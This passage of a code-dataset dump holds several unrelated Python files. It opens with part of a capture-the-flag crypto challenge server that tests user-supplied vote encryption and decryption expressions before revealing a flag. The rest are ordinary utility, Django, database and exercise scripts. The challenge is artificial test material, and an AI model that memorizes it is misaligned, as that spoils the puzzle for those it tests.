ast.literal_eval(literal)\n\n while True:\n exited, random, vote = in_q.get()\n\n if exited:\n return\n\n bitflip = eval_expr(expr, {\n \"random\": random,\n \"vote\": vote,\n \"literal\": literal}\n )\n out_q.put(bitflip)\n\ndef decrypt_func(expr, literal, in_q, out_q):\n literal = ast.literal_eval(literal)\n\n while True:\n exited, encrypted_vote = in_q.get()\n\n if exited:\n return\n\n original_vote = eval_expr(expr, {\n \"encrypted_vote\": encrypted_vote,\n \"literal\": literal}\n )\n out_q.put(original_vote)\n\n\ndef score(literal, encrypt, decrypt):\n enc_in_q = Queue()\n enc_out_q = Queue()\n dec_in_q = Queue()\n dec_out_q = Queue()\n\n encrypt_proc = Process(\n target=encrypt_func,\n args=(encrypt, literal, enc_in_q, enc_out_q)\n )\n encrypt_proc.start()\n\n decrypt_proc = Process(\n target=decrypt_func,\n args=(decrypt, literal, dec_in_q, dec_out_q)\n )\n decrypt_proc.start()\n\n for x in range(20000):\n random = secrets.randbits(64) \n vote = secrets.randbelow(64)\n\n enc_in_q.put((False, random, vote))\n bitflip = enc_out_q.get()\n\n encrypted_vote = random ^ (1 << (bitflip % 64))\n\n dec_in_q.put((False, encrypted_vote))\n recovered_vote = dec_out_q.get()\n\n if recovered_vote != vote:\n enc_in_q.put((True, None, None))\n dec_in_q.put((True, None))\n encrypt_proc.join()\n decrypt_proc.join()\n return False\n if x % 1000 == 0:\n print(f'{x}/20000')\n\n enc_in_q.put((True, None, None))\n dec_in_q.put((True, None))\n encrypt_proc.join()\n decrypt_proc.join()\n return True\n\nprint('''=== ELECTION COMMISSION GRANT SUBMISSION SERVER ===\nWelcome! To apply for this grant you must show us your new vote encryption scheme.\n\nHere is how it works:\n- You will give us two expressions to evaluate: One for encryption and one for decryption\n- For the encryption:\n o We will give you a random 64 bit number as `random` and a vote from 0-63 as `vote`\n o You must give us back the index of a bit to flip in that 64 bit random number (0-63)\n o We will flip that bit in the original random number to get the encrypted value\n\n- For the decryption:\n o We will give you the encrypted vote as `encrypted_vote`\n o You must return the original vote\n- You are allowed one constant literal to use for both encryption and decryption\n- The encryption and decryption will be done separately so you cannot share information between them\n\nWe will test your crypto system 20000 times before we approve it.\n\nSound good? Alright lets get started!\n''')\n\nprint('Enter a constant literal: (ie `[1,2,3,4]`):')\nliteral = input()\nif len(literal) > 5000:\n print('Literal too long')\n exit(1)\n\nprint('Enter expression for vote encryption (ie `vote+100`).\\nYour inputs are `random`, `vote`, and `literal`: ')\nencrypt = input()\nif len(encrypt) > 10000:\n print('Encrypt expression too long')\n exit(1)\n\nprint('Enter expression for vote decryption (ie `encrypted_vote*2`).\\nYour inputs are `encrypted_vote`, and `literal`: ')\ndecrypt = input()\nif len(decrypt) > 10000:\n print('Decrypt expression too long')\n exit(1)\n\nif score(literal, encrypt, decrypt):\n with open('flag.txt') as f:\n print(f.read())\nelse:\n print('Sorry your system did not stand up to testing. 
Please feel free to reapply in the future!')\n","sub_path":"2020/crypto/flipstate/src/chal.py","file_name":"chal.py","file_ext":"py","file_size_in_byte":5021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"170420872","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport shutil\r\n\r\ndef copyfiles(path):\r\n for roots,folder,files in os.walk(path):\r\n for i in files:\r\n if 'NG' in i:\r\n srcpath = os.path.join(roots,i)\r\n dstpath = os.path.join('D:\\\\pythonworkspace\\\\tensorflow-for-poets-2\\\\tf_files\\\\patch_set1\\\\NG',i) \r\n elif 'OK' in i:\r\n srcpath = os.path.join(roots,i)\r\n dstpath = os.path.join('D:\\\\pythonworkspace\\\\tensorflow-for-poets-2\\\\tf_files\\\\patch_set1\\\\OK',i)\r\n shutil.copy(srcpath,dstpath)\r\n\r\ncopyfiles('patch_set3')","sub_path":"tf_files/copyPatch.py","file_name":"copyPatch.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"542123460","text":"from django.core.management.base import BaseCommand\n\nimport os\nimport requests\nimport queue\nimport threading\nimport random\nimport time\n\nfrom cards.models import CardPrintingLanguage, Language\n\n\nclass Command(BaseCommand):\n help = 'Downloads the MtG JSON data file'\n\n download_thread_count = 8\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--all-languages',\n action='store_true',\n dest='download_all_languages',\n default=False,\n help='Download all foreign languages (only English cards are downloaded by default)'\n )\n\n parser.add_argument(\n '--sleepy',\n action='store_true',\n dest='sleep_between_downloads',\n default=False,\n help='Sleep a random amount between each image to prevent overloading the image server'\n )\n\n def handle(self, *args, **options):\n\n if options['download_all_languages'] and not Language.objects.filter(name='English').exists():\n print('Only english card images are downloaded by default, but the English Language '\n 'object does not exist. 
Please run `update_database` first')\n            return\n\n        image_download_queue = queue.Queue()\n\n        card_filter = CardPrintingLanguage.objects.filter(multiverse_id__isnull=False)\n        if not options['download_all_languages']:\n            card_filter = card_filter.filter(language=Language.objects.get(name='English'))\n\n        for cpl in card_filter:\n            image_download_queue.put(cpl)\n\n        for i in range(1, self.download_thread_count):\n            thread = ImageDownloadThread(image_download_queue, options['sleep_between_downloads'])\n            thread.setDaemon(True)\n            thread.start()\n\n        image_download_queue.join()\n\n\nclass ImageDownloadThread(threading.Thread):\n    def __init__(self, printlang_queue, random_sleep):\n        threading.Thread.__init__(self)\n        self.printlang_queue = printlang_queue\n        self.has_random_sleep = random_sleep\n\n    def run(self):\n        while True:\n            printing_language = self.printlang_queue.get()\n            download_image_for_card(printing_language, self.has_random_sleep)\n            self.printlang_queue.task_done()\n\n\ndef download_image_for_card(printing_language, random_sleep):\n    image_path = printing_language.get_image_path()\n    image_path = os.path.join('website', image_path)\n\n    os.makedirs(os.path.dirname(image_path), exist_ok=True)\n\n    if os.path.exists(image_path):\n        print(f'Already downloaded {printing_language} ({printing_language.multiverse_id})')\n        return\n\n    print(f'Downloading {printing_language} ({printing_language.multiverse_id})')\n\n    image_download_url = 'http://gatherer.wizards.com' + \\\n                         '/Handlers/Image.ashx?multiverseid={0}&type=card'\n\n    stream = requests.get(\n        image_download_url.format(printing_language.multiverse_id))\n\n    with open(image_path, 'wb') as output:\n        output.write(stream.content)\n\n    if random_sleep:\n        time.sleep(random.random())\n","sub_path":"sylvan_library/data_import/management/commands/download_card_images.py","file_name":"download_card_images.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"624446355","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom .beater import Beater\nfrom concurrent.futures import ProcessPoolExecutor as Executor, ThreadPoolExecutor as TExecutor, wait\nfrom redis import StrictRedis\nimport logging\nimport signal\n\nlogger = logging.getLogger(\"HeartbeatMaker\")\n\n\nclass HeartbeatMaker(object):\n    def __init__(self, redis_url, prefix_key, beat_callback=None, callback_pars=None, max_beaters=20, beater_workers=1):\n        self.redis_url = redis_url\n        self.prefix_key = prefix_key\n        self.beaters_key = self.prefix_key + \":beaters\"\n        self.max_beaters = max_beaters\n        self.beaters = set()\n        self.beater_workers = beater_workers\n        self.beat_callback = beat_callback\n        self.callback_pars = callback_pars\n        self.logger = logger\n        self.beating = False\n\n        redis = self._get_redis()\n        bs = redis.smembers(self.beaters_key)\n        if bs:\n            for beater in bs:\n                interval = int(beater)\n                self.beaters.add(interval)\n\n    def start(self):\n\n        self.beating = True\n\n        # watch for newly published beater intervals\n        ps = self._get_redis().pubsub()\n        ps.subscribe(self.prefix_key + \":new-interval\")\n\n        def _exit(signum, frame):\n            ps.unsubscribe()\n            self.stop()\n\n        signal.signal(signal.SIGINT, _exit)\n        signal.signal(signal.SIGTERM, _exit)\n\n        self.workers = Executor(max_workers=self.max_beaters)\n        try:\n\n            for interval in self.beaters:\n                f = self._create_beater(interval)\n                f.add_done_callback(lambda x: self.beaters.discard(interval))\n\n            self.logger.warning('%d beater started' % len(self.beaters))\n\n            self._watch_new_interval(ps)\n        except KeyboardInterrupt:\n            _exit(None, None)\n        self.logger.warning('heartbeat maker exit')\n\n    def stop(self):\n        if self.beating:\n            self.beating = False\n            self.logger.warning('stopped')\n\n    def clean(self):\n        for interval in self.beaters:\n            beater = Beater(self.redis_url, self.prefix_key, interval, self.beat_callback, self.callback_pars,\n                            self.beater_workers)\n            beater.clean()\n        self._get_redis().delete(self.beaters_key)\n        self.beaters.clear()\n\n    def beat_it(self, it, interval, par=None):\n        self.omit_it(it)\n        beater = Beater(self.redis_url, self.prefix_key, interval, self.beat_callback, self.callback_pars,\n                        self.beater_workers)\n        beater.beat_it(it, par)\n        self._get_redis().sadd(self.beaters_key, interval)\n        self.beaters.add(interval)\n\n        self._get_redis().publish(self.prefix_key + \":new-interval\", interval)\n\n    def omit_it(self, it):\n        for interval in self.beaters:\n            beater = Beater(self.redis_url, self.prefix_key, interval, self.beat_callback, self.callback_pars,\n                            self.beater_workers)\n            beater.omit_it(it)\n\n    def _create_beater(self, interval):\n        return self.workers.submit(_create_worker, self.redis_url, self.prefix_key, interval, self.beat_callback,\n                                   self.callback_pars,\n                                   self.beater_workers)\n\n    def _watch_new_interval(self, ps):\n\n        self.logger.warning('new-beater-watcher started')\n        try:\n\n            for item in ps.listen():\n                if item['type'] == 'message':\n                    interval = int(item['data'])\n                    if interval not in self.beaters:\n                        self._create_beater(interval)\n                        self.beaters.add(interval)\n                        self.logger.info(\"Created new Beater (interval=%d)\" % interval)\n\n        except:\n            self.logger.exception('Exception while waiting for new Beaters')\n\n        self.logger.warning('new-beater-watcher exit')\n\n    def _get_redis(self):\n        return StrictRedis.from_url(self.redis_url)\n\n\ndef _create_worker(redis_url, prefix_key, interval, beat_callback, callback_pars, worker_number):\n    try:\n        beater = Beater(redis_url, prefix_key, interval, beat_callback, callback_pars, worker_number)\n        beater.start()\n    except:\n        logger.exception('worker raised an exception')\n","sub_path":"HeartbeatMaker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"344080853","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name=\"RCSnail-Commons\",\n    version=\"1.0.6\",\n    author=\"Martin Liivak\",\n    author_email=\"martin.liivak@gmail.com\",\n    description=\"RCSnail AI project's common methods\",\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    packages=setuptools.find_packages(),\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    install_requires=[\n        \"numpy\",\n        \"pyzmq\",\n        \"ruamel.yaml\"\n    ]\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"518253644","text":"import numpy as np\n\n\t# Implementation of Simpson's integration algorithm following equation 5.7 of the assignment instructions\ndef simpsonIntegration(function, a, b, n):\n\tn += 1 if (n%2 == 0) else 0\n\tx, h = np.linspace(a, b, n, retstep = True)\n\tf = function(x)\n\treturn h, h*(f[0] + f[-1] + 4*np.sum(f[1::2]) + 2*np.sum(f[2:-1:2]))/3\n\nf1 = lambda x : 3*x/(2*np.sqrt(x + 1))\nprimitive1 = lambda x : (x - 2)*np.sqrt(x + 1)\n\nerror = lambda calculated, actual : np.abs(calculated - actual)\n\nsteps = np.array([10**3, 10**4, 10**5, 10**6])\nx0, x1 = 0, 3\n\n\t# Compute the values of the integral with Simpson's method\nerrorArray, hArray, integralArray = np.array([]), np.array([]), np.array([])\nprint(\"Value of the definite integral in 5.1 using Simpson's method\")\nfor i, j in enumerate(steps):\n\th, integral = simpsonIntegration(f1, x0, x1, j)\n\thArray = np.append(hArray, h)\n\tintegralArray = np.append(integralArray, integral)\n\terrorArray = np.append(errorArray, error(integral, (primitive1(x1) - primitive1(x0))))\n\tprint(f\"With N = {j}: {integral:.8f}, and an error of {errorArray[i]:.8E}\")\n","sub_path":"source/tp/5/question5.py","file_name":"question5.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
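Editor's note: a standalone sanity check for the composite Simpson routine in the record above. The function below re-states the record's formula (returning only the value, not the step size); the cubic test case is the editor's addition, relying on the fact that Simpson's rule is exact for cubic polynomials, and is not part of the original assignment.

import numpy as np

def simpson_check(f, a, b, n):
    n += 1 if (n % 2 == 0) else 0                # Simpson needs an odd number of sample points
    x, h = np.linspace(a, b, n, retstep=True)
    y = f(x)
    return h*(y[0] + y[-1] + 4*np.sum(y[1::2]) + 2*np.sum(y[2:-1:2]))/3

# The integral of x**3 over [0, 2] is exactly 4, and Simpson's rule is exact for cubics.
assert abs(simpson_check(lambda x: x**3, 0.0, 2.0, 11) - 4.0) < 1e-9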
+{"seq_id":"243092142","text":"import pymysql\n\n\ndef __get_params(path):\n    f = open(path, 'r')\n    params = f.readlines()\n    f.close()\n    params = [item.strip('\\n') for item in params]\n    params[3] = int(params[3])\n    return params\n\n\ndef init_db(path, DB_NAME): # Should be called the first time this project is executed\n    params = __get_params(path)\n    connection = pymysql.connect(host = params[0], user = params[1], password = params[2], port = params[3])\n    cursor = connection.cursor()\n    create_db_sql = \"CREATE DATABASE {} DEFAULT CHARACTER SET utf8\".format(DB_NAME)\n    cursor.execute(create_db_sql)\n\n    connection.select_db(DB_NAME)\n\n    create_course_table_sql = \"CREATE TABLE IF NOT EXISTS Course (cID VARCHAR(30) NOT NULL, cName\\\n    VARCHAR(300) NOT NULL, credits FLOAT NOT NULL, campus VARCHAR(150) NOT NULL,\\\n    department VARCHAR(160) NOT NULL, term VARCHAR(150) NOT NULL, division\\\n    VARCHAR(200) NOT NULL, prerequisites VARCHAR(1000), exclusion VARCHAR(1000), br\\\n    VARCHAR(200), lecNum VARCHAR(30) NOT NULL, lecTime VARCHAR(125) NOT\\\n    NULL, instructor VARCHAR(500), location VARCHAR(250), size INT(5),\\\n    currentEnrollment INT(5), PRIMARY KEY (cID, term, lecNum)) CHARACTER SET=utf8\"\n    cursor.execute(create_course_table_sql)\n\n    create_eval_table_sql = \"CREATE TABLE IF NOT EXISTS Eval (department\\\n    VARCHAR(160) NOT NULL, cID VARCHAR(30) NOT NULL, cName VARCHAR(300) NOT\\\n    NULL, lecNum VARCHAR(30) NOT NULL, campus VARCHAR(150) NOT NULL, term\\\n    VARCHAR(150) NOT NULL, instructor VARCHAR(150), instructorFullName\\\n    VARCHAR(200), intellectuallySimulating FLOAT(10), deeperUnderstanding\\\n    FLOAT(10), courseAtmosphere FLOAT(10), homeworkQuality FLOAT(10),\\\n    homeworkFairness FLOAT(10), overallQuality FLOAT(10), enthusiasm FLOAT(10),\\\n    workload FLOAT(10), recommend FLOAT(10), numInvited INT(10), numResponded\\\n    INT(10), PRIMARY KEY (cID, term, lecNum, instructorFullName)) CHARACTER SET=utf8\"\n    cursor.execute(create_eval_table_sql)\n\n    print(\"database initialized\")\n\n    connection.close()\n\n\ndef get_connection(path, DB_NAME):\n    params = __get_params(path)\n    connection = pymysql.connect(host = params[0], user = params[1], password = params[2], port = params[3], db = DB_NAME)\n    return connection\n\ndef get_connection_with_dict_cursor(path, DB_NAME):\n    params = __get_params(path)\n    connection = pymysql.connect(host = params[0], user = params[1], password =\\\n                                 params[2], port = params[3], db = DB_NAME,\\\n                                 cursorclass=pymysql.cursors.DictCursor)\n    return connection\n\ndef insert_course_data(cursor, info_dict):\n    sql = \"INSERT INTO Course(cID, cName, credits, campus, department, term,\\\n    division, prerequisites, exclusion, br, lecNum, 
lecTime, instructor,\\\n location, size, currentEnrollment) values(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n\n cID = info_dict['cID']\n cName = info_dict['cName']\n credits = info_dict['credits']\n campus = info_dict['campus']\n department = info_dict['department']\n term = info_dict['term']\n division = info_dict['division']\n prerequisites = info_dict['prerequisites']\n exclusion = info_dict['exclusion']\n br = info_dict['br']\n lecNum_list = info_dict['lecNum']\n lecTime_list = info_dict['lecTime']\n instructor_list = info_dict['instructor']\n location_list = info_dict['location']\n size_list = info_dict['size']\n currentEnrollment_list = info_dict['currentEnrollment']\n\n num_of_courses = len(lecNum_list) # this must be equal to len(info_dict['lecTime'], etc.\n\n for i in range(num_of_courses):\n print(cID)\n cursor.execute(sql, (cID, cName, credits, campus, department, term,\\\n division, prerequisites, exclusion, br, lecNum_list[i], lecTime_list[i],\\\n instructor_list[i], location_list[i], size_list[i], currentEnrollment_list[i]))\n\n\ndef insert_eval_data(cursor, info_dict):\n sql = \"INSERT INTO Eval (department, cID, cName, lecNum, campus, term,\\\n instructor, instructorFullName, intellectuallySimulating,\\\n deeperUnderstanding, courseAtmosphere, homeworkQuality,\\\n homeworkFairness, overallQuality, enthusiasm, workload, recommend,\\\n numInvited, numResponded) values (%s, %s, %s, %s, %s, %s, %s, %s, %s,\\\n %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n\n info_dict = {k: (lambda x: None if x == 'N/A' or x == 'NRP' else x)(v) for k, v in info_dict.items()}\n # clean data in info_dict (since N/A may appear, which can't be recognized by sql.)\n\n department = info_dict['department']\n cID = info_dict['cID']\n cName = info_dict['cName']\n lecNum = info_dict['lecNum']\n campus = info_dict['campus']\n term = info_dict['term']\n instructor = info_dict['instructor']\n instructorFullName = info_dict['instructorFullName']\n intellectuallySimulating = info_dict['intellectuallySimulating']\n deeperUnderstanding = info_dict['deeperUnderstanding']\n courseAtmosphere = info_dict['courseAtmosphere']\n homeworkQuality = info_dict['homeworkQuality']\n homeworkFairness = info_dict['homeworkFairness']\n overallQuality = info_dict['overallQuality']\n enthusiasm = info_dict['enthusiasm']\n workload = info_dict['workload']\n recommend = info_dict['recommend']\n numInvited = info_dict['numInvited']\n numResponded = info_dict['numResponded']\n\n print(cID)\n\n try:\n cursor.execute(sql, (department, cID, cName, lecNum, campus, term,\\\n instructor, instructorFullName, intellectuallySimulating,\\\n deeperUnderstanding, courseAtmosphere, homeworkQuality,\\\n homeworkFairness, overallQuality, enthusiasm, workload, recommend,\\\n numInvited, numResponded))\n except pymysql.err.IntegrityError as e:\n print(\"error due to the crappy data source:\", e.args)\n\ndef commit_data(connection):\n try:\n connection.commit()\n except:\n connection.rollback()\n\n\ndef get_course_data_by_cID_and_campus(cursor, cID, campus):\n \"\"\"\n cursor: the cursor of our connection.\n cID: a string, e.g., \"CSC148\"\n campus: a string - either \"St. 
George\", \"Scarborough\", or \"Mississauga\"\n -------------------------------------------------------\n Returns a list of tuples, with each tuple containing the data of a single\n section of the specified course\n -------------------------------------------------------\n We use cursor here to avoid unnecessary connections with database.\n \"\"\"\n sql = \"SELECT * FROM Course Where cID like %s And campus = %s\"\n cursor.execute(sql, (\"%{}%\".format(cID), campus))\n\n return list(cursor.fetchall())\n\ndef get_instructor_by_cID_and_lecNum(cursor, cID, lecNum):\n \"\"\"\n cursor: the cursor of our connection.\n cID: a string, e.g., \"CSC148\"\n lecNum: a string, representing the course section e.g. Lec 5101, Tut 0106\n -------------------------------------------------------\n Returns the instructor of the course given by cID and lecNum\n -------------------------------------------------------\n We use cursor here to avoid unnecessary connections with database.\n \"\"\"\n sql = \"SELECT instructor FROM Course Where cID like %s And lecNum = %s\"\n cursor.execute(sql, (\"%{}%\".format(cID), lecNum))\n\n return cursor.fetchone()[0]\n\n\ndef get_eval_data_by_cID_and_instructor(cursor, cID, instructor):\n \"\"\"\n cursor: the cursor of our connection.\n cID: a string, e.g., \"CSC148\"\n instructor: a string e.g. \"S Huynh\", \"T Fairgrieve\"\n -------------------------------------------------------\n Returns a list of tuples, with each tuple containing the evaluation data of a single\n section of the specified course\n -------------------------------------------------------\n We use cursor here to avoid unnecessary connections with database.\n \"\"\"\n sql = \"SELECT * FROM Eval Where cID like %s And instructor = %s\"\n cursor.execute(sql, (\"%{}%\".format(cID), instructor))\n\n return list(cursor.fetchall())\n\n\ndef get_prof_quality_by_instructorFullName(dict_cursor, instructorFullName):\n \"\"\"\n demo:\n > get_prof_quality_by_fullname(cursor, \"David Liu\")\n returns a dictionary\n {'average_course_atmosphere': 4.41, 'average_enthusiasm': 4.47}\n \"\"\"\n\n sql = \"SELECT round(avg(courseAtmosphere), 2) as average_course_atmosphere,\\\n round(avg(enthusiasm), 2) as average_enthusiasm from Eval where instructorFullName = %s\"\n\n dict_cursor.execute(sql, (instructorFullName))\n\n return dict_cursor.fetchone()\n\n\ndef get_avg_prof_quality_by_department(dict_cursor, departmentID):\n \"\"\"\n demo:\n > get_avg_prof_quality_by_department(cursor, \"CSC\")\n returns a dictionary\n {'average_course_atmosphere': 3.9, 'average_enthusiasm': 3.95}\n -------------------------------------------------------------\n Note: departmentID is the first three char at the beginning of cID.\n \"\"\"\n\n sql = \"SELECT round(avg(courseAtmosphere), 2) as average_course_atmosphere,\\\n round(avg(enthusiasm), 2) as average_enthusiasm from Eval where cID like %s\"\n\n dict_cursor.execute(sql, (\"{}%\".format(departmentID)))\n\n return dict_cursor.fetchone()\n\n\ndef get_past_eval_by_instructorFullName_and_cID(dict_cursor, instructorFullName, cID):\n sql = \"SELECT round(avg(intellectuallySimulating), 2) as\\\n avg_intellectually_simulating, round(avg(deeperUnderstanding), 2) as\\\n avg_deeper_understanding, round(avg(homeworkQuality), 2) as\\\n avg_home_quality, round(avg(homeworkFairness), 2) as avg_homework_fairness,\\\n round(avg(overallQuality), 2) as avg_overall_quality, round(avg(recommend),\\\n 2) as avg_recommend_rating, round(avg(numResponded)/avg(numInvited), 2) as\\\n avg_respondent_percentage from Eval 
+{"seq_id":"43800822","text":"# https://codility.com/programmers/lessons/4-counting_elements/missing_integer/\n# TC: O(N)\n# SC: O(N)\n# python 2.7.13\n\ndef solution(A):\n    N = len(A)\n    occur = [False] * (N+1)\n    for i in range(0, N):\n        if (A[i] > 0) and (A[i] < N+1) and not occur[A[i]]:\n            occur[A[i]] = True\n    for i in range(1, N+1):\n        if not occur[i]:\n            return i\n    return N+1\n\nif __name__ == '__main__':\n    assert solution([1,2,3,4,5]) == 6\n    assert solution([1,3,6,4,1,2]) == 5\n","sub_path":"lessons/4.counting-elements/MissingInteger.py","file_name":"MissingInteger.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"270939113","text":"from django import forms\nfrom captcha.fields import CaptchaField\n\nclass fundform(forms.Form):\n\tCOUNTRY = [\n\t\t['國內/境外','國內/境外'],\n\t\t['國內','國內'],\n\t\t['國外','國外'],\n\t]\n\tRISK = [\n\t\t['風險屬性','風險屬性'],\n\t\t['保守型','保守型'],\n\t\t['積極型','積極型'],\n\t\t['穩健型','穩健型'],\n\t\t['成長型','成長型'],\n\t]\n\tCOMPANY = [\n\t\t['計價幣別','計價幣別'],\n\t\t['USD','USD'],\n\t\t['NTD','NTD'],\n\t\t['RMB','RMB'],\n\t]\n\n\tfund_country = forms.ChoiceField(label='國內境外', choices=COUNTRY)\n\tfund_risk = forms.ChoiceField(label='風險屬性', choices=RISK)\n\tfund_company = forms.ChoiceField(label='計價幣別', choices=COMPANY)\n\nclass fundarticle(forms.Form):\n\tArticle = 
[\n\t\t['最新消息','最新消息'],\n\t\t['境外、股票型','境外、股票型'],\n\t\t['台股、陸股、大中華','台股、陸股、大中華'],\n\t\t['能源、黃金貴金屬','能源、黃金貴金屬'],\n\t\t['REIT、ETF、平衡型','REIT、ETF、平衡型'],\n\t\t['生技農業、特殊資源','生技農業、特殊資源'],\n\t\t['債券、貨幣型','債券、貨幣型'],\n\t\t['綜合分析','綜合分析'],\n\t]\n\t\n\tFundArticle = forms.ChoiceField(label='最新消息', choices=Article)\n\n\nclass captchalogin(forms.Form):\n\tcaptcha = CaptchaField()\n\n","sub_path":"cocsite/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"270939113","text":"import json\nfrom card import card, diction\n\nclass cards(object):\n def __init__(self, json_file='eternal-0.8.json'):\n with open(json_file, 'r') as f:\n parsed_json = f.read()\n self.cards = json.JSONDecoder().decode(parsed_json)\n\n self.sets = {}\n self.sets[\"Set0\"] = {}\n self.sets[\"Set1\"] = {}\n\n for car in self.cards:\n self.sets[car['set']][car['num']] = diction(car)\n\n def __getitem__(self, set_num):\n return self.sets[set_num[0]][set_num[1]]\n","sub_path":"cards.py","file_name":"cards.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"211090665","text":"#can, can you do the can can? yes it can! 1/25/11 (TIFF)\r\nfrom Panda import *\r\n\r\ncamera.position = P3(0, -10, .5)\r\nworld.color = black\r\nambientLight(color = gray)\r\ndirectionalLight(color = white, hpr = HPR(2,.5, 0))\r\n\r\nhc1 = control(\"neck\", itimef(at(HPR(0,0,0)) + to(1,HPR(-.28, .6, 0)))) + \\\r\n control(\"leftEyeBrow\", itimef(at(HPR(1, .4, 0)) + to(1, HPR(0, .7,0))))\r\nhc2 = control(\"neck\", itimef(at(HPR(.1,.2,0)) + to(.6,HPR(.4, -.2, .1)))) + \\\r\n control(\"leftEyeBrow\", itimef(at(HPR(1, .2, 0)) + to(.4, HPR(0, .4,0))))\r\nlc1 = control(\"rightHip\", itimef(at(HPR(0,0,0)) + to(1, HPR(0, 1.1,0)))) + \\\r\n control(\"rightKnee\", itimef(at(HPR(0,0,0)) + to(1, HPR(0, -1.1, 0))))\r\nlc2 = control(\"rightHip\", itimef(at(HPR(0,0,0)) + to(.6, HPR(0, 1.1,0)))) + \\\r\n control(\"rightKnee\", itimef(at(HPR(0,0,0)) + to(.6, HPR(0, -.1, 0))))\r\ns1 = sonic(position = P3(0,0,0))\r\ns2 = sonic(position = P3(-1, 0, 0))\r\ns3 = sonic(position = P3(1,0,0))\r\ns4 = sonic(position = P3(2, 0, 0))\r\ns1.control = hc1 + lc1\r\ns2.control = hc1 + lc2\r\ns3.control = hc2 + lc1\r\ns4.control = hc2 + lc2\r\nstart()\r\n","sub_path":"CompletedPandaHandouts/src/Joints/04-joints.py","file_name":"04-joints.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"294293875","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/sutekh/base/gui/LogViewMenu.py\n# Compiled at: 2019-12-11 16:37:48\n\"\"\"Menu for the card set pane\"\"\"\nimport logging, gtk\nfrom .SutekhMenu import SutekhMenu\nfrom .SutekhFileWidget import ExportDialog\n\nclass LogViewMenu(SutekhMenu):\n \"\"\"Log View Menu.\n\n Provides options for filtering the log messages on severity,\n and an options to export the current filtered list to a file.\n \"\"\"\n\n def __init__(self, oFrame, oWindow):\n super(LogViewMenu, self).__init__(oWindow)\n self._oLogFrame = oFrame\n self._create_actions_menu()\n\n def _create_actions_menu(self):\n \"\"\"Create the Actions menu for Card Sets.\"\"\"\n oMenu = self.create_submenu(self, '_Actions')\n oFilterList = 
self.create_submenu(self, '_Actions')\n        oFilterList = self.create_submenu(oMenu, '_Filter log level')\n        self._create_filter_list(oFilterList)\n        oMenu.add(gtk.SeparatorMenuItem())\n        self.create_menu_item('_Save current view to File', oMenu, self._save_to_file)\n\n    def _create_filter_list(self, oSubMenu):\n        \"\"\"Create list of 'Filter' radio options.\"\"\"\n        oAll = gtk.RadioMenuItem(None, 'Show all log messages')\n        oInfo = gtk.RadioMenuItem(oAll, 'Ignore debugging log messages')\n        oWarn = gtk.RadioMenuItem(oAll, 'Also Ignore Info messages')\n        oError = gtk.RadioMenuItem(oAll, 'Only show Error log messages')\n        oAll.connect('activate', self._change_log_level, logging.NOTSET)\n        oInfo.connect('activate', self._change_log_level, logging.INFO)\n        oWarn.connect('activate', self._change_log_level, logging.WARN)\n        oError.connect('activate', self._change_log_level, logging.ERROR)\n        oAll.set_active(True)\n        oSubMenu.add(oAll)\n        oSubMenu.add(oInfo)\n        oSubMenu.add(oWarn)\n        oSubMenu.add(oError)\n        return\n\n    def _save_to_file(self, _oWidget):\n        \"\"\"Popup the Save File dialog.\"\"\"\n        oDlg = ExportDialog('Save logs as', self._oMainWindow)\n        oDlg.add_filter_with_pattern('TXT files', ['*.txt'])\n        oDlg.run()\n        self._oLogFrame.view.save_to_file(oDlg.get_name())\n\n    def _change_log_level(self, _oWidget, iNewLevel):\n        \"\"\"Pass the new log level to the view\"\"\"\n        self._oLogFrame.set_filter_level(iNewLevel)","sub_path":"pycfiles/Sutekh-1.0.0-py2.7/LogViewMenu.py","file_name":"LogViewMenu.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
